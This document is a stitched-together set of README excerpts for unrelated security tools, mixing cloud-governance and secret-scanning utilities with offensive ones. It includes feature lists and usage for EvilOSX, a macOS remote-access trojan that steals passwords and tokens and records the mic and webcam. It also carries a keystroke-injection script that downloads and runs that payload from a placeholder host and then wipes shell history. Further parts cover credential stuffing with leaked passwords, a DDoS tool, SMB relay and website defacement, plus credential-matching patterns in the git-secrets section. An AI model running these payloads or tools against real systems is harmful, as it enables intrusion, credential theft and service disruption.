• Comprehensive support for AWS services and resources (> 100), along with 400+ actions and 300+ filters to build policies with.
• Supports arbitrary filtering on resources with nested boolean conditions.
• Dry run any policy to see what it would do.
• Automatically provisions AWS Lambda functions, AWS Config rules, and Cloudwatch event targets for real-time policies.
• AWS Cloudwatch metrics outputs on resources that matched a policy
• Structured outputs into S3 of which resources matched a policy.
• Intelligent cache usage to minimize api calls.
• Battle-tested - in production on some very large AWS accounts.
• Supports cross-account usage via STS role assumption.
• Supports integration with custom/user supplied Lambdas as actions.
• Supports both Python 2.7 and Python 3.6 (beta) Lambda runtimes

$ virtualenv --python=python2 custodian
$ source custodian/bin/activate
(custodian) $ pip install c7n

policies:
- name: remediate-extant-keys
  description: |
    Scan through all s3 buckets in an account and ensure all objects
    are encrypted (default to AES256).
  resource: s3
  actions:
    - encrypt-keys

- name: ec2-require-non-public-and-encrypted-volumes
  resource: ec2
  description: |
    Provision a lambda and cloud watch event target
    that looks at all new instances and terminates those with
    unencrypted volumes.
  mode:
    type: cloudtrail
    events:
        - RunInstances
  filters:
    - type: ebs
      key: Encrypted
      value: false
  actions:
    - terminate

- name: tag-compliance
  resource: ec2
  description: |
    Schedule a resource that does not meet tag compliance policies
    to be stopped in four days.
  filters:
    - State.Name: running
    - "tag:Environment": absent
    - "tag:AppId": absent
    - or:
      - "tag:OwnerContact": absent
      - "tag:DeptID": absent
  actions:
    - type: mark-for-op
      op: stop
      days: 4

# Validate the configuration (note this happens by default on run)
$ custodian validate policy.yml

# Dryrun on the policies (no actions executed) to see what resources
# match each policy.
$ custodian run --dryrun -s out policy.yml

# Run the policy
$ custodian run -s out policy.yml

Salactus

Scale out s3 scanning.

Mailer

A reference implementation of sending messages to users to notify them.

TrailDB

Cloudtrail indexing and timeseries generation for dashboarding

LogExporter

Cloud watch log exporting to s3

Index

Indexing of custodian metrics and outputs for dashboarding

Sentry

Log parsing for python tracebacks to integrate with https://sentry.io/welcome/

• Network Interface - Information, Configure
• IP-Scanner
• Port-Scanner
• Ping
• Traceroute
• DNS Lookup
• Remote Desktop
• PuTTY
• SNMP - Get, Walk, Set (v1, v2c, v3)
• Wake on LAN
• HTTP Headers
• Subnet Calculator - Calculator, Subnetting, Supernetting
• Lookup - OUI, Port
• Connections
• Listeners
• ARP Table

• English
• German
• Russian

• Windows 7 or later
• .NET-Framework 4.6
• RDP 8.1 (How to install RDP 8.1 on Windows 7/Server 2008 R2?)

mkvirtualenv repokid
git clone git@github.com:Netflix/repokid.git
cd repokid
python setup.py develop
repokid config config.json

• RoleId (string) as a primary partition key, no primary sort key
• A global secondary index named Account with a primary partition key of Account and RoleId and Account as projected attributes
• A global secondary index named RoleName with a primary partition key of RoleName and RoleId and RoleName as projected attributes

• Only create one.
• Needs the ability to call sts:AssumeRole into all of the RepokidRoles.
• DyamoDB permissions for the repokid_roles table and all indexes (specified in assume_role subsection of dynamo_db in config) and the ability to run dynamodb:ListTables

• Must exist in every account to be managed by repokid.
• Must have a trust policy allowing RepokidInstanceProfile.
• Name must be specified in connection_iam in config file.
• Has these permissions:

{
 "Version": "2012-10-17",
 "Statement": [
   {
     "Action": [
       "iam:DeleteInstanceProfile",
       "iam:DeleteRole",
       "iam:DeleteRolePolicy",
       "iam:GetInstanceProfile",
       "iam:GetRole",
       "iam:GetRolePolicy",
       "iam:ListInstanceProfiles",
       "iam:ListInstanceProfilesForRole",
       "iam:ListRolePolicies",
       "iam:ListRoles",
       "iam:PutRolePolicy",
       "iam:UpdateRoleDescription"
     ],
     "Effect": "Allow",
     "Resource": "*"
   }
 ]
}

• dynamodb: If using dynamo locally, set the endpoint to http://localhost:8010. If using AWS hosted dynamo, set the region, assume_role, and account_number.
• aardvark_api_location: The location to your Aardvark REST API. Something like https://aardvark.yourcompany.net/api/1/advisors
• connection_iam: Set assume_role to RepokidRole, or whatever you have called it.

• Exclude role name for all accounts: add it to a list in the config filter_config.BlacklistFilter.all
• Exclude role name for specific account: add it to a list in the config filter_config.BlacklistFilter.<ACCOUNT_NUMBER>

{
  "arns": ["arn1", "arn2"],
  "names": {"role_name_1": ["all", "account_number_1"], "role_name_2": ["account_number_2", "account_number_3"]}
}

• Update role cache: repokid update_role_cache <ACCOUNT_NUMBER>
• Display role cache: repokid display_role_cache <ACCOUNT_NUMBER>
• Display information about a specific role: repokid display_role <ACCOUNT_NUMBER> <ROLE_NAME>
• Repo a specific role: repokid repo_role <ACCOUNT_NUMBER> <ROLE_NAME>
• Repo all roles in an account: repokid repo_all_roles <ACCOUNT_NUMBER> -c

• List repoable services from a role
• Set or remove an opt-out
• List and perform rollbacks for a role

git secrets --scan [-r|--recursive] [--cached] [--no-index] [--untracked] [<files>...]
git secrets --scan-history
git secrets --install [-f|--force] [<target-directory>]
git secrets --list [--global]
git secrets --add [-a|--allowed] [-l|--literal] [--global] <pattern>
git secrets --add-provider [--global] <command> [arguments...]
git secrets --register-aws [--global]
git secrets --aws-provider [<credentials-file>]

make install

brew install git-secrets

cd /path/to/my/repo
git secrets --install
git secrets --register-aws

--install

Installs hooks for a repository. Once the hooks are installed for a git repository, commits and non-ff merges for that repository will be prevented from committing secrets.

--scan

Scans one or more files for secrets. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched. If no files are provided, all files returned by git ls-files are scanned.

--scan-history

Scans repository including all revisions. When a file contains a secret, the matched text from the file being scanned will be written to stdout and the script will exit with a non-zero RC. Each matched line will be written with the name of the file that matched, a colon, the line number that matched, a colon, and then the line of text that matched.

--list

Lists the git-secrets configuration for the current repo or in the global git config.

--add

Adds a prohibited or allowed pattern.

--add-provider

Registers a secret provider. Secret providers are executables that when invoked outputs prohibited patterns that git-secrets should treat as prohibited.

--register-aws

Adds common AWS patterns to the git config and ensures that keys present in ~/.aws/credentials are not found in any commit. The following checks are added:

• AWS Access Key ID via [A-Z0-9]{20}
• AWS Secret Access Key assignments via ":" or "=" surrounded by optional quotes
• AWS account ID assignments via ":" or "=" surrounded by optional quotes
• Allowed patterns for example AWS keys (AKIAIOSFODNN7EXAMPLE and wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)
• Enables using ~/.aws/credentials to scan for known credentials.

Note
While the patterns registered by this command should catch most instances of AWS credentials, these patterns are not guaranteed to catch them all. git-secrets should be used as an extra means of insurance -- you still need to do your due diligence to ensure that you do not commit credentials to a repository.

--aws-provider

Secret provider that outputs credentials found in an INI file. You can optionally provide the path to an ini file.

-f, --force

Overwrites existing hooks if present.

<target-directory>

When provided, installs git hooks to the given directory. The current directory is assumed if <target-directory> is not provided.
If the provided <target-directory> is not in a Git repository, the directory will be created and hooks will be placed in <target-directory>/hooks. This can be useful for creating Git template directories using with git init --template <target-directory>.
You can run git init on a repository that has already been initialized. >From the git init documentation:

>From the git documentation: Running git init in an existing repository is safe. It will not overwrite things that are already there. The primary reason for rerunning git init is to pick up newly added templates (or to move the repository to another place if --separate-git-dir is given).

The following git hooks are installed:

1. pre-commit: Used to check if any of the files changed in the commit use prohibited patterns.
2. commit-msg: Used to determine if a commit message contains a prohibited patterns.
3. prepare-commit-msg: Used to determine if a merge commit will introduce a history that contains a prohibited pattern at any point. Please note that this hook is only invoked for non fast-forward merges.

Note
Git only allows a single script to be executed per hook. If the repository contains Debian style subdirectories like pre-commit.d and commit-msg.d, then the git hooks will be installed into these directories, which assumes that you've configured the corresponding hooks to execute all of the scripts found in these directories. If these git subdirectories are not present, then the git hooks will be installed to the git repo's .git/hooks directory.

cd /path/to/my/repository
git secrets --install

git secrets --install /path/to/my/repository

git secrets --install ~/.git-templates/git-secrets
git init --template ~/.git-templates/git-secrets

git secrets --install -f

-r, --recursive

Scans the given files recursively. If a directory is encountered, the directory will be scanned. If -r is not provided, directories will be ignored.
-r cannot be used alongside --cached, --no-index, or --untracked.

--cached

Searches blobs registered in the index file.

--no-index

Searches files in the current directory that is not managed by Git.

--untracked

In addition to searching in the tracked files in the working tree, --scan also in untracked files.

<files>...

The path to one or more files on disk to scan for secrets.
If no files are provided, all files returned by git ls-files are scanned.

git secrets --scan

git secrets --scan /path/to/file

git secrets --scan -r /path/to/directory

git secrets --scan /path/to/file /path/to/other/file

git secrets --scan /path/to/directory/*

echo 'hello!' | git secrets --scan -

--global

Lists only git-secrets configuration in the global git config.

--global

Adds patterns to the global git config

-l, --literal

Escapes special regular expression characters in the provided pattern so that the pattern is searched for literally.

-a, --allowed

Mark the pattern as allowed instead of prohibited. Allowed patterns are used to filter our false positives.

<pattern>

The regex pattern to search.

git secrets --add '[A-Z0-9]{20}'

git secrets --add --global '[A-Z0-9]{20}'

git secrets --add --literal 'foo+bar'

git secrets --add -a 'allowed pattern'

--global

Adds AWS specific configuration variables to the global git config.

[<credentials-file>]

If provided, specifies the custom path to an INI file to scan. If not provided, ~/.aws/credentials is assumed.

--global

Adds the provider to the global git config.

<command>

Provider command to invoke. When invoked the command is expected to write prohibited patterns separated by new lines to stdout. Any extra arguments provided are passed on to the command.

git secrets --add-provider -- git secrets --aws-provider

git secrets --add-provider -- cat /path/to/secret/file/patterns

git secrets --add --allowed 'my regex pattern'

git secrets --add-provider -- git secrets --aws-provider

This is a test!
password=ex@mplepassword
password=******
More test...

git secrets --add 'password\s*=\s*.+'
git secrets --add --allowed --literal 'ex@mplepassword'

/tmp/example:3:password=******

[ERROR] Matched prohibited pattern

Possible mitigations:
- Mark false positives as allowed using: git config --add secrets.allowed ...
- List your configured patterns: git config --get-all secrets.patterns
- List your configured allowed patterns: git config --get-all secrets.allowed
- Use --no-verify if this is a one-time false positive

/tmp/example:2:password=ex@mplepassword
/tmp/example:3:password=******

git secrets --add --allowed '/tmp/example:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0

git secrets --add --allowed '/tmp/example:3:.*'
git secrets --scan /tmp/example && echo $?
# Outputs: 0

pip install -r ./requirements.txt

python cred_scanner.py 

Usage: cred_scanner.py [OPTIONS]

Options:
  --path TEXT  Path other than the local directory to scan
  --secret     Also look for Secret Key patterns. This may result in many
               false matches due to the nature of secret keys.
  --help       Show this message and exit.

• Search for public leaks for the email and returns the result with the most useful details about the leak (Using haveibeenpwned API) and tries to get the plain text passwords from leaks it find (Using @GhostProjectME).
• Now you give it a password or a leaked password then it tries this credentials against some well-known websites (ex: facebook, twitter, google...) and tells if the login successful!

• Check if the targeted email is in any leaks and then use the leaked password to check it against the websites.
• Check if the target credentials you found is reused on other websites/services.
• Checking if the old password you got from the target/leaks is still used in any website.

usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email

positional arguments:
  email       Email/username to check

optional arguments:
  -h, --help  show this help message and exit
  -p          Don't check for leaks or plain text passwords.
  -np         Don't check for plain text passwords.
  -q          Quiet mode (no banner).

• Python 3.x or 2.x (preferred 3).
• Linux or Windows system.
• Worked on some machines with MacOS and python3.
• The requirements mentioned in the next few lines.

cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -h

git clone https://github.com/D4Vinci/Cr3dOv3r.git
cd Cr3dOv3r
python3 -m pip install -r requirements.txt
python3 Cr3dOv3r.py -h

git clone https://github.com/D4Vinci/Cr3dOv3r.git
docker build -t cr3dov3r Cr3dOv3r/
docker run -it cr3dov3r "example@gmail.com"

• Twitter

• Emulate a terminal instance
• Simple extendable module system
• No bot dependencies (pure python)
• Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
• Persistent
• GUI and CLI support
• Retrieve Chrome passwords
• Retrieve iCloud tokens and contacts
• Retrieve/monitor the clipboard
• Retrieve browser history (Chrome and Safari)
• Phish for iCloud passwords via iTunes
• iTunes (iOS) backup enumeration
• Record the microphone
• Take a desktop screenshot or picture using the webcam
• Attempt to get root via local privilege escalation

# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Start listening for connections
$ python3 start.py

# Lastly, run the built launcher (see the builder tab) on your target(s)

# Create a launcher to infect your target(s)
$ python3 builder.py

# Start listening for connections
$ python3 start.py --cli --port 1337

# Lastly, run the built launcher on your target(s)

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
• Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
• To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.

• URLs (in-scope & out-of-scope)
• URLs with parameters (example.com/gallery.php?id=2)
• Intel (emails, social media accounts, amazon buckets etc.)
• Files (pdf, png, xml etc.)
• JavaScript files & Endpoints present in them
• Strings based on custom regex pattern

python photon.py -u http://example.com

python photon.py -u http://example.com -l 3

2

python photon.py -u http://example.com -d 1

0

python photon.py -u http://example.com -t 10

2

python photon.py -u http://example.com -c "PHPSSID=821b32d21"

python photon.py -u http://example.com --ninja

False

• codebeautify.org
• photopea.com
• pixlr.com

python photon.py -u http://example.com --dns

python photon.py -u http://example.com -s "http://example.com/portals.html,http://example.com/blog/2018"

python photon.py -u http://example.com -r "\d{10}"

1. Download and install/run FF Password Exporter. Use the links above.
2. Choose the Firefox user's profile directory you want to export passwords from.
3. If you have set a master password to protect your Firefox passwords, enter it.
4. Choose your export format: CSV or JSON.
5. Click the export button and save the file to your device.

• Firefox 58+ with key4.db profiles

• Node.js

npm install
npm run electron

• Banner Grab
• Whois
• Traceroute
• DNS Record
• Reverse DNS Lookup
• Zone Transfer Lookup
• Port Scan
• Admin Panel Scan
• Subdomain Scan
• CMS Identify
• Reverse IP Lookup
• Subnet Lookup
• Extract Page Links
• Directory Fuzz (NEW)
• File Fuzz (NEW)
• Shodan Search (NEW)
• Shodan Host Lookup (NEW)

• Wordpress
      | WPScan
      | WPScan Bruteforce
      | Wordpress Plugin Vulnerability Checker
          Features: // I will add more soon.
          | WordPress Woocommerce - Directory Craversal
          | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
          | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
          | WordPress Plugin Events Calendar - 'event_id' SQL Injection
• Auto SQL Injection
      Features:
      | Union Based
      | (Error Output = False) Detection
      | Tested on 100+ Websites

• Deface Page
• Password Generator // NEW
• Text To Hash //NEW

Any Python Version.

$ git clone https://github.com/cr4shcod3/pureblood
$ cd pureblood
$ pip install -r requirements.txt

 

 

• Colorama
• Requests
• Python-whois
• Dnspython
• BeautifulSoup
• Shodan

• Cr4sHCoD3 - Pure Blood

• Content Management System (CMS) -> 6
• Web Frameworks -> 22
• Cookies/Headers Security
• Languages -> 9
• Operating Systems (OS) -> 7
• Server -> ALL
• Web App Firewall (WAF) -> 50+

• Bash Commands Injection
• Blind SQL Injection
• Buffer Overflow
• Carriage Return Line Feed
• SQL Injection in Headers
• XSS in Headers
• HTML Injection
• LDAP Injection
• Local File Inclusion
• OS Commanding
• PHP Code Injection
• SQL Injection
• Server Side Injection
• XPath Injection
• Cross Site Scripting
• XML External Entity

• Apache Status Page
• Open Redirect
• PHPInfo
• Robots.txt
• XST

• Admin Panel
• Common Backdoor
• Common Backup Dir
• Common Backup File
• Common Dir
• Common File
• Hidden Parameters

• Credit Cards
• Emails
• Private IP
• Errors -> (fatal errors,...)
• SSN

$ git clone https://github.com/m4ll0k/WAScan.git wascan
$ cd wascan 
$ pip install BeautifulSoup
$ python wascan.py

$ python wascan.py --url http://xxxxx.com/ --scan 0

$ python wascan.py --url http://xxxxx.com/index.php?id=1 --scan 1

$ python wascan.py --url http://xxxxx.com/ --scan 2

$ python wascan.py --url http://xxxxx.com/ --scan 3

$ python wascan.py --url http://xxxxx.com/ --scan 4

$ python wascan.py --url http://xxxxx.com --scan 5 

$ python wascan.py --url http://xxxxx.com/test.php --brute

$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --data "id=1" --method POST
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx 
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321 --ragent -v

• C project which compiles a PE loader implementation (RDI) to shellcode
• Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

• ShellcodeRDI: Compiles shellcode for the DLL loader
• NativeLoader: Converts DLL to shellcode if neccesarry, then injects into memory
• DotNetLoader: C# implementation of NativeLoader
• Python\ConvertToShellcode.py: Convert DLL to shellcode in place
• Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
• PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
• FunctionTest: Imports sRDI C function for debug testing
• TestDLL: Example DLL that includes two exported functions for call on Load and after

from ShellcodeRDI import *

dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

DotNetLoader.exe TestDLL_x64.dll

python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

• Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.
• PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.

• Python\ConvertToShellcode.py
• PowerShell\ConvertTo-Shellcode.ps1

• bin\NativeLoader.exe
• bin\DotNetLoader.exe
• bin\TestDLL_.dll
• bin\ShellcodeRDI_.bin

Commits per week on faraday code repository from July 2017 to June 2018

• New Server: Implemented with Flask.
• New Database engine: PostgreSQL.
• New REST API: With complete support for CRUD for every object from Faraday. It makes it simpler to do queries for the DB and it opens up new ways for personalized integrations. Run python manage.py show_urls to see all our new API endpoints.

curl 'http://localhost:5985/_api/v2/ws/europe/hosts'  -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];'

• Better scalability and performance improvements. There’s a drastic reduction in time needed for searches in our API and with the new architecture it’s significantly easier to scale-up horizontally.

• Imports Scan Outputs directly from the Web UI.
• Now you can import results from your scans directly on our Web UI:

• Import Scan Outputs via API.

curl 'http://127.0.0.1:5985/_api/v2/ws/test/upload_report' -H 'Content-Type: multipart/form-data' -H 'Cookie: AuthSession=[COOKIE]; session=[COOKIE];' --data-binary $’[FILE BINARY DATA]’ --compressed

• Dramatic performance upgrades.
• Simplification of the model we used. Say "adios" to the interface object.
• Access to the server using “/” instead of /_ui/ .
• Ability to edit the names of workspaces.

• HP WebInspect
• IP360
• Sslyze
• Wfuzz
• Xsssniper
• Brutexss
• Recon-NG
• Sublist3r
• Dirsearch

• Allow faraday-server to have multiple instances
• Add hostname to host
• Interface removed from model and from persistence server lib (fplugin)
• Performance improvements on the backend
• Add quick change workspace name (from all views)
• Allow user to change workspace
• New faraday styles in all Webui views
• Add search by id for vulnerabilities
• Add new plugin Sslyze
• Add new plugin Wfuzz
• Add xsssniper plugin
• Fix W3af, Zap plugins
• Add Brutexss plugin
• Allow to upload report file from external tools from the web
• Fix sshcheck import file from GTK
• Add reconng plugin
• Add sublist3r plugin
• Add HP Webinspect plugin
• Add dirsearch plugin
• Add ip360 plugin
• CouchDB was replaced by PostgreSQL :)
• Host object changed, now the name property is called ip
• Interface object was removed
• Note object was removed and replaced with Comment
• Communication object was removed and replaced with Comment
• Show credentials count in summarized report on the dashboard
• Remove vuln template CWE fields, join it with references
• Allow to search hosts by hostname, os and service name
• Allow the user to specify the desired fields of the host list table
• Add optional hostnames, services, MAC and description fields to the host list
• Workspace names can be changed from the Web UI
• Changed the scope field of a workspace from a free text input to a list of targets
• Exploitation and severity fields only allow certain values. 
• CWE CVEs were fixed to be valid. A script to convert custom CSVs was added.
• Web UI path changed from /ui/ to / (ui has now a redirection to / for keeping backwards compatibility)
• dirb plugin should creates a vulnerability type information instead of a note.
• Add confirmed column to exported CSV from Webui
• Fixes in Arachni plugin
• Add new parameters --keep-old and --keep-new for faraday CLI
• Add new screenshot fplugin which takes a screenshot of the ip:ports of a given protocol
• Add fix for net sparker regular and cloud fix on severity
• Admin users can list and access all workspaces, even if they don't have permissions
• Removed Chat feature (data is kept inside notes)
• Plugin reports now can be imported in the server, from the Web UI
• Add CVSS score to reference field in Nessus plugin.
• Fix unicode characters bug in Netsparker plugin.
• Fix Qualys plugin.
• Fix bugs with MACOS and GTK.
• Add response field added to model in grouped report template.
• Add tooltip in WebUi with information about errors in executive report.
• Ldap now login is with user@domain.com, not user only anymore.
• Fix Jira bugs in WebUi

go get -u github.com/senorprogrammer/wtf
cd $GOPATH/src/github.com/senorprogrammer/wtf
make install
make run

• Installation
• Configuration
• Module Documentation

• See the big picture and think out of the box
• More efficiently find, verify and combine vulnerabilities
• Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
• Perform more tactical/targeted fuzzing on seemingly risky areas
• Demonstrate true impact despite the short timeframes we are typically given to test.

Note: This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Using a virtualenv is highly recommended!

pip install git+https://github.com/owtf/owtf#egg=owtf

python setup.py install

$ virtualenv <venv name>  $ source <venv name>/bin/activate  $ brew install coreutils gnu-sed openssl  # We need to install 'cryptography' first to avoid issues  $ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"  $ git clone <this repo>  $ cd owtf  $ python setup.py install  # Run OWTF!  $ owtf  

• Resilience: If one tool crashes OWTF, will move on to the next tool/test, saving the partial output of the tool until it crashed.
• Flexible: Pause and resume your work.
• Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:
  • Passive : No traffic goes to the target
  • Semi Passive : Normal traffic to target
  • Active: Direct vulnerability probing
• Extensive REST API.
• Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE coverage.
• Web interface: Easily manage large penetration engagements easily.
• Interactive report:
• Automated plugin rankings from the tool output, fully configurable by the user.
• Configurable risk rankings
• In-line notes editor for each plugin.

• Project homepage
• IRC
• Wiki
• Slack and join channel #project-owtf
• User Documentation
• Youtube channel
• Slideshare
• Blog

pip3 install -e . --user

sudo pip3 install -e .

python3 -c "import neto; print(neto.__version__)"

neto analysis -u https://yoururl.com/extension-name.xpi

neto analysis -e ./my-extension-name.xpi

>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'

>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…

$ neto daemon

         ____            _           _      _   _      _
        |  _ \ _ __ ___ (_) ___  ___| |_   | \ | | ___| |_ ___
        | |_) | '__/ _ \| |/ _ \/ __| __|  |  \| |/ _ \ __/ _ \ 
        |  __/| | | (_) | |  __/ (__| |_   | |\  |  __/ || (_) |
        |_|   |_|  \___// |\___|\___|\__|  |_| \_|\___|\__\___/
                      |__/

                                    Developed by @ElevenPaths
                                    Version: 0.5.0b


 * Running on http://localhost:14041/ (Press CTRL+C to quit)

 curl --data-binary '{"id":0, "method":"remote", "params":["https://example.com/myextension.xpi"], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041

• Manifest analysis.
• Internal file hashing.
• Entities extraction using regular expressions: IPv4, email, cryptocurrency addresses, URL, etc.
• Comments extraction from HTML, CSS and JS files.
• Cryptojacking detection engine based on known mining domains and expressions.
• Suspicious Javascript code detection such as eval().
• Certificate analysis if provided.
• Batch analysis of previously downloaded extensions.

 USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -n, --nosslcheck   Do not verify SSL Certificate                    (default: True)
    -h, --help         Shows this help

• util/getuas.py - Fetchs user-agent lists from http://www.useragentstring.com/pages/useragentstring.php subpages (ex: ./getuas.py http://www.useragentstring.com/pages/Browserlist/) REQUIRES BEAUTIFULSOUP4
• res/lists/useragents - Text lists (one per line) of User-Agent strings (from http://www.useragentstring.com)

• 2016-02-06 Added support for not verifying SSL Certificates
• 2014-02-20 Added randomly created user agents (still RFC compliant).
• 2014-02-19 Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
• 2013-03-26 Changed from threading to multiprocessing. Still has some bugs to resolve like I still don't know how to propperly shutdown the manager.
• 2012-12-09 Initial release

• Change from getopt to argparse
• Change from string.format() to printf-like

1. Spins up an SMB server and waits for an incoming SMB connection
2. The incoming credentials are relayed to a specified target, creating a connection with the context of the relayed user
3. Queries are made down the SMB connection to the lsarpc pipe to get the list of domain usernames. This is done by cycling up to 50000 RIDs

• Python 2.7 (sorry but impacket doesn't play nice with 3 :( )
• Impacket v0.9.17 or above

pipenv install --two
pipenv shell

# Optional: Run if installing impacket
git submodule update --init --recursive
cd submodules/impacket
python setup.py install
cd ../..

python ridrelay.py -t 10.0.0.50

python ridrelay.py -t 10.0.0.50 -o path_to_output.txt

• Add password policy enumeration
• Dynamic relaying based on where incoming creds have admin rights
• Getting active sessions???
• Connect with Bloodhound???

$ stegcracker <file> [<wordlist>]

$ sudo apt-get install steghide -y
$ sudo curl https://raw.githubusercontent.com/Paradoxis/StegCracker/master/stegcracker > /bin/stegcracker
$ sudo chmod +x /bin/stegcracker